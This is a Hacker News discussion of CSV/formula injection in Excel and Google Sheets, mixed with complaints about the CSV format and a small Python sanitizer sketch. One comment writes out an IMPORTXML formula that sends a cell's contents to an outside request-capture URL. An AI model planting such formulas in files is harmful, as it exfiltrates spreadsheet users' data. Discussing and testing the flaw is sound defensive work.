
Dangers of CSV Injection - rpenm
http://georgemauer.net/2017/10/07/csv-injection.html
======
Dylan16807
> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found
> only one (undocumented) thing that works with any sort of reliability: For
> any cell that begins with one of the formula triggering characters =, -, +,
> or @, you should directly prefix it with a tab character.

> Unfortunately that’s not the end of the story. The character might not show
> up, but it is still there. A quick string length check with =LEN(D4) will
> confirm that.

The documented way is prefixing with a ' character. It doesn't have the length
issue either.

As to the root issue, I can't think of any perfect way to transfer a series of
values between applications that apply different types to those values and
applications that don't. At some point, something is going to have to guess.
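For what it's worth, the quote-prefix defense is easy to bolt onto an exporter. A minimal Python sketch (the function names are mine, not from any library):

```python
import csv
import io

# Characters that Excel/Sheets treat as formula triggers at the start of a cell.
FORMULA_TRIGGERS = ("=", "-", "+", "@")

def sanitize_cell(value: str) -> str:
    # Prefix risky cells with a single quote so spreadsheet apps render
    # them as literal text instead of evaluating them as formulas.
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

def write_safe_csv(rows):
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow([sanitize_cell(str(cell)) for cell in row])
    return buf.getvalue()
```

As the thread notes, this survives only one round trip: Excel's own CSV exporter drops the quote again on re-save.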

~~~
autra
> The documented way is prefixing with a ' character. It doesn't have the
> length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV
> exporter doesn't write the ', so if the user saves the ‘safe’ file and then
> loads it again all the problems are back.

:-/

~~~
smhenderson
That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will
happily eat leading zeros. There is a specific number format to correct that.
If you export that file to CSV with the format set, the CSV file will have 5
digits. If you reopen that CSV file in Excel it gobbles up the zeros all over
again.

As someone mentioned elsewhere this is an issue with long numbers. Excel
converts them to scientific notation. Reformat and export, all good. Reopen
said file, back to scientific notation.

Really anything that relies on an escape character (') or a specific format
gets lost on export to CSV. It exports correctly but there is simply no way to
document these formats in a CSV file and have it be compatible with anything
but Excel.
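To be clear, the CSV bytes themselves keep the zeros; a quick check with Python's stdlib shows the loss happens only when a consumer coerces the field to a number:

```python
import csv
import io

data = "zip,city\n02134,Boston\n00501,Holtsville\n"

# csv.reader never infers types: every field comes back as a string,
# so the leading zeros survive intact.
rows = list(csv.reader(io.StringIO(data)))
assert rows[1][0] == "02134"

# The "gobbling" happens only when a consumer guesses "number":
assert str(int(rows[1][0])) == "2134"  # leading zero gone
```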

~~~
ewheeler
Same with phone numbers. In most parts of the world, local numbers (not fully-
qualified with country code) are written/dialed with a leading zero. Excel
eats these and/or uses scientific notation!

------
pavel_lishin
Excel is the source of so many problems. At work, we ask users for an input in
CSV or Excel format, and most people see "CSV" and export Excel data as CSV.
Which is fine and great, but long numbers - such as UPCs - show up in Excel as
scientific notation, being big scary numbers, _and also get exported as such_.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that
contains "1.23456E+11", which is worse than useless.

~~~
geocar
_CSV_ is the source of so many problems. CSV has no character set and no rule
for escaping double-quotation marks, commas, and newlines. There's not even a
way to look at a CSV file and tell what its "rules" are beyond heuristics, and
those only take you so far.

I ask for XLSX files since at least it's structured, unambiguous and
documented, but even better: a minimal XLSX parser is trivial (about a page)
to write.

Also: Educating users on how to specify the character set in every application
that the user seems to want to use is a special kind of hell.

~~~
dvlsg
Rfc 4180 definitely lays out rules for how to escape double quotes, commas,
and newlines.
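For reference, Python's stdlib csv module implements exactly that RFC 4180 scheme: fields containing the delimiter, a quote, or a newline get wrapped in double quotes, and embedded quotes are doubled:

```python
import csv
import io

buf = io.StringIO()
# RFC 4180 style: CRLF line endings, quote-doubling for embedded quotes.
writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\r\n")
writer.writerow(['he said "hi"', 'a,b', 'line1\nline2'])

assert buf.getvalue() == '"he said ""hi""","a,b","line1\nline2"\r\n'
```

Whether the consumer on the other end follows the same rules is, of course, the whole dispute below.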

~~~
geocar
RFC4180 is worse than worthless; do not implement it and claim you support
"CSV files". Almost every paragraph is useless, wrong, or dangerous; its few
citations offer conflicting and sometimes clearly-stupid advice where they
advise the use of CSV at all. Some examples:

§ 2.1 says that lines end in CRLF. This is in opposition to every UNIX-based
system out there (which outnumber systems that use CRLF as a line delimiter by
between 2:1 and 8:1 depending on how you choose to estimate this) and means
that CSV files either don't exist on Mac OS X or Linux, or aren't "text files"
by the standard definition of that term -- both absolutely silly conclusions!
Nevertheless, following RFC4180-logic, § 2.6 thus suggests that a bare line-
feed can appear unquoted.

§ 2.3 says the header is optional and that a client knows if it is present
because the MIME type says "text/csv; header", but then § 3 admits that this
isn't very helpful and clients will have to "make their own decision" anyway.

§ 2.7 requires fortran-style doubling of double-quote marks, like COBOL and
SQL, and ignores that many "CSV" systems use backslash to escape quotes.

§ 3 says that the character set is in the mime type. Operating systems which
don't use MIME types for their file system (i.e. almost all of them) thus
cannot support any character set other than "US-ASCII".

None of these "suggestions" are true of any operating system I'm aware of, nor
are they true of any popular CSV consumer; If a conforming implementation of
RFC4180 exists, it's definitely not useful. In fact, one of the citations
(ESR) says:

 _The bad results of proliferating special cases are twofold. First, the
complexity of the parser (and its vulnerability to bugs) is increased. Second,
because the format rules are complex and underspecified, different
implementations diverge in their handling of edge cases. Sometimes
continuation lines are supported, by starting the last field of the line with
an unterminated double quote — but only in some products! Microsoft has
incompatible versions of CSV files between its own applications, and in some
cases between different versions of the same application (Excel being the
obvious example here)._

A better spec would be honest about these special cases. A "good"
implementation of CSV:

• needs a flag or switch indicating whether there is a header or not

• needs to be explicitly told the character set

• needs a flag to specify the escaping method \ or ""

• needs the line-ending specified (CR, LF, CRLF, [\r\n]{1,}, or \r{0,}\n{1,})

... and it needs all of these flags and switches "user-accessible". RFC4180
doesn't mention any of this, and so anyone who picks it up looking for
guidance is going to be deluded into thinking that there are rules for
"escaping double quotes" or "commas" or "newlines" that will help them consume
and produce CSV files. Anyone writing specifications for developers who tries
to use RFC4180 for guidance to implement the "import CSV files" feature is
going to be hung out to dry.

The devil has demanded I support CSV, so the advice I can give to anyone who
has received a similar requirement:

• parse using a state machine (and not by recursive splitting or a regex-with-
backtracking).

• use heuristics to "guess" the delimiter by observing that a file is likely
rectangular -- tricky, since some implementations don't include trailing
delimiters if the trailing values in a row are missing. I use a bag of
delimiters (, ; and tab) and choose the one that produces the most columns,
but has no rows with more columns than the first.

• use heuristics to "guess" the character set _especially if the import might
have come from Windows_. For web applications I use header-hints to guess the
operating system and language settings to adjust my weights.

• use heuristics to "guess" the line-ending method. I normally use whatever
the first-line ends in unless [\r\n]{1,} produces a better rectangle and no
subsequent lines extend beyond the first one.
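A naive version of the "most columns, still rectangular" delimiter guess might look like this in Python (a sketch of the heuristic described above, not the author's code; it ignores quoting, so it's only a first pass, and the stdlib's csv.Sniffer does a fancier version of the same guessing):

```python
def guess_delimiter(text, candidates=(",", ";", "\t")):
    # Pick the candidate that yields the most columns while keeping the
    # file "rectangular": no row wider than the first (header) row.
    lines = [line for line in text.splitlines() if line]
    best, best_cols = ",", 1
    for d in candidates:
        widths = [line.count(d) + 1 for line in lines]
        if widths[0] > best_cols and max(widths) <= widths[0]:
            best, best_cols = d, widths[0]
    return best
```

Short rows (missing trailing delimiters) are tolerated; any row wider than the header disqualifies the candidate.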

A successful and fast implementation of all of these tricks is a challenge for
any programmer. If you guess first, then let the user guide changes with
switches, your users will be happiest, but this is very relative: Users think
parsing CSV is "easy" so they're sure to complain about any issues. I have
saved per-user coefficients for my heuristic guesses to try and make users
happier. I have wasted more time on CSV than I have any other file format.

My advice is that we should ignore RFC4180 completely and, given the choice,
avoid CSV files for any real work. XLSX is unambiguous and easy enough that a
useful implementation takes less space than my criticism of CSV does, and,
weirdly enough, many uses of "CSV" are just "I want to get my data out of
Excel" anyway.

~~~
linuxps2
To me the issue isn't how we should read in CSV (as you stated, we should use
a different format that is less ambiguous) but rather getting vendors to
provide the data in that new format. I've found that most vendors I work with
are using a cobbled together solution built on top of a mainframe and getting
them to add/remove a field from CSV is a monumental task, there is no way they
will move to a different format like XLSX or JSON or XML. Until there is an
open, industry-wide standard, I just don't see CSV going away

~~~
geocar
Which part of that do you think I disagreed with?

~~~
linuxps2
None? You seemed to have touched mostly on _consuming_ CSV and safe ways to do
that and suggested XLSX - I'm just adding that digesting CSV safely isn't our
biggest issue, it's getting vendors to use something other than CSV and
unfortunately that is typically out of most people's control.

------
datenwolf
The thing that puzzles me the most is that people use _C_SV at all:
separation by comma, or by any other member of the printable subset of ASCII,
in the first place. What this essentially boils down to is ambiguous in-band
signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation:
Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but
without the ambiguities of separation characters and the need to quote
strings. Heck if payload data is limited to the subset ASCII/UTF-8 without
control codes you can just dump anything without the need for escaping or
quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated
values). Use ASV (ASCII separated values).
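The round trip really is trivial when the separators can't appear in the payload. A small Python sketch (assuming, as the comment stipulates, that values contain no ASCII control codes):

```python
US = "\x1f"  # unit separator: between fields
RS = "\x1e"  # record separator: between rows

def dump_asv(rows):
    # Join fields with US and rows with RS -- no quoting, no escaping.
    return RS.join(US.join(fields) for fields in rows)

def load_asv(blob):
    # Splitting is unambiguous because the separators never occur in data.
    return [record.split(US) for record in blob.split(RS)]

rows = [["name", "note"], ["alice", 'commas, "quotes", and\nnewlines are fine']]
assert load_asv(dump_asv(rows)) == rows  # lossless round trip
```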

~~~
ajdlinux
Give me a version of every standard text editor that can let me display and
edit these ASV files when I just need to quickly hack something, and sure,
I'll use it. CSV is directly editable in any text editor and manipulable by
standard text processing tools, that's one of its key advantages.

~~~
emidln
Vim and Emacs can. If your editor can't, maybe it should get with the (54 year
old) program.

~~~
apocalyptic0n3
The number of devs who can competently use Vim or Emacs is already on the low
side. The number of non-devs that can do it is far lower. The file needs to be
editable by _any_ user with a text editor, not just a developer versed in
Vim/Emacs.

I know the response will be "they'll just open it in Excel anyway" which is
true in most cases, but I frequently have clients that want to download an
export, modify it real quick with a text editor (many use Notepad++ for this),
and then reupload it. They're usually doing massive find/replaces on the data
and then reuploading into the system and a simple text editor is a lot better
for this than Excel.

~~~
zeveb
> The number of devs who can competently use Vim or Emacs is already on the
> low side.

Someone who cannot competently use either vim or emacs is not a developer.

> The number of non-devs that can do it is far lower.

The emacs paper talked about departmental secretaries using — and extending —
emacs. Human beings are far cleverer than we like to think.

~~~
UncleMeat
CS PhD and professional software engineer here. I can edit files very slowly
and inefficiently in both vim and emacs but it would be a mess to use them for
real work.

Some people never learned either of the editors. So what? The physical act of
writing text was never the hard part of software engineering.

------
bitexploder
I have been finding this vulnerability in apps since I started in infosec 10
years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky
data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because
of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column
names... schema injection, like SQLi only more hilarious)

Point is apps and devs can have blind spots (knowledge gaps) or just not think
of a CSV import or export like other functionality.

~~~
e1g
We recently went through an external pentest simulating a hostile actor with
inside information. We had 2 weeks to prepare and successfully defended
against timing attacks, DDoS attempts, identity spoofs, request modifications,
script injections etc. Passed with flying colors... except for CSV/Excel
injection. Everyone looked at each other with the sheepish embarrassment of
being pwned by a script kiddie. This was a total blind spot indeed, even after
we reviewed every other user I/O.

~~~
f00_
>defend against DDoS but not sanitizing user input

>calling a pentester a script kiddie

welp, my work is done here

~~~
e1g
I wrote "script kiddie" as a way to describe the relative complexity of this
attack vector - I was highly impressed with the pentest process, and think
it's one of the smartest things we did this quarter.

Filtering user inputs is security 101, yet we missed this while focusing on
fancy defense mechanics. This large gap between what the engineering team
prepared for, and how they were exposed, is what made the outcome
"embarrassing" \- hence I agreed with GP that CSV/Excel stuff could be a blind
spot even for well-trained people.

~~~
f00_
for sure, I think i'm just sensitive to the use of script kiddie haha

At least you're thinking about it; the company I work for definitely
prioritizes freedom over security, if you know what I mean.

------
kristofferR
CSV is hell. Some idiot somewhere decided that Comma Separated Values in
certain locales should be based on semicolons (who would have thought files
would be shared across country borders!?), so when we open CSV files that are
actually comma separated all the information is in the first cell (until a
semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around
with OS language settings. CSV as a format should have died years ago, it's a
shame so many apps/services only export CSV files. Many developers (mainly
US/UK based) are probably not aware of how much of a headache they inflict on
people in other countries by using CSV files.

~~~
seszett
> _Some idiot somewhere decided that Comma Separated Values in certain locales
> should be based on semicolons_

Semicolons are really better though, because they aren't used as a decimal
separator unlike commas in most countries.

I don't know about Excel, but LibreOffice makes it very easy to select which
parameters to use when opening a CSV file; it works just fine.

~~~
PhasmaFelis
> _Semicolons are really better though, because they aren't used as a decimal
> separator unlike commas in most countries._

If you're going to separate values with semicolons--which is perfectly
reasonable--I feel like you probably shouldn't do that with a format called
Comma Separated Values.

------
splike
Interestingly, genetic biologists are probably more aware of this problem than
most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they
automatically get converted to dates by Excel. This has potentially had a
fairly large effect on research in the area [1]. One of the many reasons we
insist on only using Ensembl IDs for genes at my company.

[1]
[https://genomebiology.biomedcentral.com/articles/10.1186/s13...](https://genomebiology.biomedcentral.com/articles/10.1186/s13059-016-1044-7)

~~~
xelxebar
Just curious, but what about non-vertebrates? I'd have expected there to be an
official number/hash that identifies genes like the InChI Key for chemistry or
something. IIRC, that key in particular is just a SHA-256 of a long human-
readable "chemical formula".

~~~
splike
We'll cross that bridge when we come to it I guess, but we work almost
exclusively with human and mouse genomes for now.

In any case, I imagine the Ensembl ID is still safer than other encodings in
the case of invertebrates. For example, gene IDs in the fruit fly genome look
like FBgn0034730.

------
jkabrg
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV
dialect with its own file extension. Or maybe just use SQLite tables or
Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when
I change operating system. Sometimes I end up clobbering the file itself.

Good things:

* Human readable.

* Simple.

I think the addition of some rules, and a standard interpretation of them,
could go some way to improving the format.

~~~
kqr
See, one of the reasons CSV managed to get so ubiquitous is precisely because
all those things are unspecified. CSV is not a popular format; CSV is the name
we give 960 visually similar but very different formats that as a collective
are popular.

The thing you use CSV for is not its technical merit. You use CSV for its
ubiquity. If you nailed down all those things you talk about, you would have a
much, much smaller user base and there would be no reason to use CSV in the
first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

------
fulafel
This is foremost a vulnerability in Excel and Google Sheets, like the article
concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing
code?

~~~
sanotehu
Yes, through the "Import" feature. Excel will in that case allow you to choose
what "type" each column in the CSV has (and will not parse text if given the
"text" type). The problem is that a lot of users (myself included) will use
muscle memory and double-click a CSV file in Windows Explorer rather than
opening up Excel and initiating an import.

~~~
yjftsjthsd-h
So why does it not import when opening files?

~~~
mijamo
Because you can create documents with formulas, save them as CSV and open them
again. If it did an import when opening, the sequence save A -> load A would
produce a different result than the file you had when you clicked save.

Or at least this is the most logical explanation I could find.

------
top_post
Sorry to balk, but I'm more outraged at the title: another "injection" I need
to talk about that isn't really the case. The root cause is the interpreter
executing untrusted input; the same can be said about macros or any other file
type. The perception problem is that most people open CSV files on a regular
basis and assume they are safe or not interpreted, when it appears they are.

~~~
bitexploder
Well, it catches folks by surprise. We could abstract all computer vulns down
to a few broad computing concepts, but that isn't as useful.

This one is your data turned out to be code. There are many, many books on all
the various forms this takes. Memory corruption cat and mouse..... It is a
long complex story that we can sweep up into that generalization. But it is
important to know the high, medium, and low levels of these issues. They form
a gigantic tree. The medium level is where devs need to threat model most of
the time. But some of the time things are very specific and you just need to
know about the specific thing and not its various generalized forms, because
the specific thing can really matter. E.g. simple programming mistakes lead to
side channels, etc. We can understand side channels generically quite easily,
but it takes a ton of specific hard-earned knowledge to avoid them.

~~~
top_post
It kind of is more useful to abstract them, so we're not whack-a-moling the
current hype or hot title of the day and can focus on the fundamental issues.

I agree, it catches people off guard to think CSV files once interpreted can
do more than give columns of information, but it's not an injection which is
my beef.

~~~
bitexploder
You have to do both. When something unusual comes up it is good to file it
away as a possibility. To be fair, these have always been "obvious" on
pentests.
When you start from the point of all input is dangerous, how can I abuse this
one, it becomes the logical conclusion to put in an Excel formula. That is
your point, I think. But my experience has told me some inputs are just
assumed safe, even by developers that program defensively. So you have to
embrace both IMO.

------
Cyranix
This seems like an appropriate place to suggest that anyone who finds these
kinds of attack vectors interesting should check out the bug bounty program
for my current place of work, which processes loads of CSV and Excel files
from government customers.

[https://bugcrowd.com/socrata](https://bugcrowd.com/socrata)

(But please, just do me a small favor and don't submit any reports for SQL
injection or information disclosure if you're using the SQL-like API that we
expressly provide for the purpose of accessing public data. We get a couple
clueless people sending such reports every week.)

------
Swizec
This brings XSS to a whole new level. Imagine what happens if you know some of
what you post in a website as a user eventually gets reviewed by somebody who
gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

~~~
_betty_
This used to be common with txt files and IE's terrible practice of sniffing
content. It would see a txt file that contained HTML and display the HTML
instead; it could then pull in a secret Silverlight file that was masquerading
as a docx file, as they are both simply zip files. Even more amusingly,
Silverlight and docx contents don't clash, so it could still be a valid docx
file if you opened it, and the txt file would look like txt even though it was
really rendering HTML with a hidden Silverlight app.

------
Mortiffer
In case anyone else was wondering about Google Forms: I tried inputting
=IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text
field, and Google automatically prepends a "'" so that '=IMPORTXML does not
execute.
------
jaclaz
At least here (Italy) CSV is not commonly used (because of the different way
we use the comma as a decimal point) and the default (in Excel) separator is
then set to a semi-colon.

A more common format is TSV (TAB delimited), which makes a lot more sense.
However, the best choice when importing data into Excel is still to change the
file extension to a non-recognized one (like, say, .txt) and, in the
"import wizard", set the appropriate separator and set all columns as "text".

------
captn3m0
On the first attack vector: Google Security has a nice post about it [0] and
why they do not consider it a valid threat. This is their reasoning:

> CSV files are just text files (the format is defined in RFC 4180) and
> evaluating formulas is a behavior of only a subset of the applications
> opening them - it's rather a side effect of the CSV format and not a
> vulnerability in our products which can export user-created CSVs. This issue
> should be mitigated by the application which would be importing/interpreting
> data from an external source, as Microsoft Excel does (for example) by
> showing a warning. In other words, the proper fix should be applied when
> opening the CSV files, rather than when creating them.

[0]:
[https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)

Their policy makes it sound like the second vulnerability should indeed be
fixed in Google Sheets itself (it is the one opening the file, after all).
------
jonnycomputer
CSV is a mess (are a mess?), but all these vulnerabilities have to do with
spreadsheet applications' consumption of CSVs. There are very legitimate
reasons a CSV might include fragments of potentially executable code, after
all.

------
filereaper
I'd be curious if anyone has hit exploits with CSV files and bulk ingestion
into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of
their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV, and it's easy to inspect visually
compared to more efficient binary formats like ORC or Parquet.

------
tatersolid
Like it or not, Excel’s behavior defines the CSV file format and how it is
used in the real world. The writing of an RFC 15 years too late has not and
will never “fix” CSV. It’s crusted over with bugs and inconsistencies for
all time.

Use anything else, even XLSX which is at least a typed and openly standardized
format.

------
stepri
When you import a CSV file into Google Sheets (File -> Import), you can choose
in the dialog to convert text to numbers and dates. If you choose not to
convert, Google Sheets places a single quote (') before the function.

------
ecesena
Does anybody know any good library that solves this problem, in any language?

------
ComodoHacker
My Excel 2010 doesn't execute shell code from author's example. Heck, it
doesn't even parse CSV and loads everything into one column as text. What am I
doing wrong?

~~~
randkyp
As weird as it sounds, it might be related to your system region settings,
specifically the decimal point sign and the thousands separator sign. I've
only been able to open CSVs by manually importing them with Excel's 'import
data from text file' function.

------
TAForObvReasons
CSV is a pretty poor format in that it mixes the presentation and the
underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy
?). The "standard" RFC4180 is extremely vague when discussing value
interpretation. As proprietary as XLSX is, at least the Excel format separates
the raw values from the presentation.

~~~
pmoriarty
There's nothing in CSV that has anything to do with presentation (nor with
what the underlying values are, for that matter).

These vulnerabilities can't be blamed on CSV so much as on the desire of
application vendors to treat data as code.

------
beached_whale
Excel protects against this, at least mine does (v2013).

~~~
Piskvorrr
As mentioned, it protects by showing a wall of text with "yes" preselected at
the bottom; equally useless and annoying.

------
jasonmaydie
Shouldn't this be "the dangers of Excel"? CSVs are benign.

------
hutch120
Little Bobby Tables reminds us to sanitize our database inputs.

[https://imgs.xkcd.com/comics/exploits_of_a_mom.png](https://imgs.xkcd.com/comics/exploits_of_a_mom.png)

~~~
billpg
That's bad advice.

[http://blog.hackensplat.com/2013/09/never-sanitize-your-inputs.html](http://blog.hackensplat.com/2013/09/never-sanitize-your-inputs.html)

~~~
trishmapow2
Expected something revolutionary, turned out to be an argument over
semantics...

~~~
billpg
I'm going to interpret your comment as high praise. If you object to that
interpretation, I'll dismiss your objection as just an argument over
semantics. :)

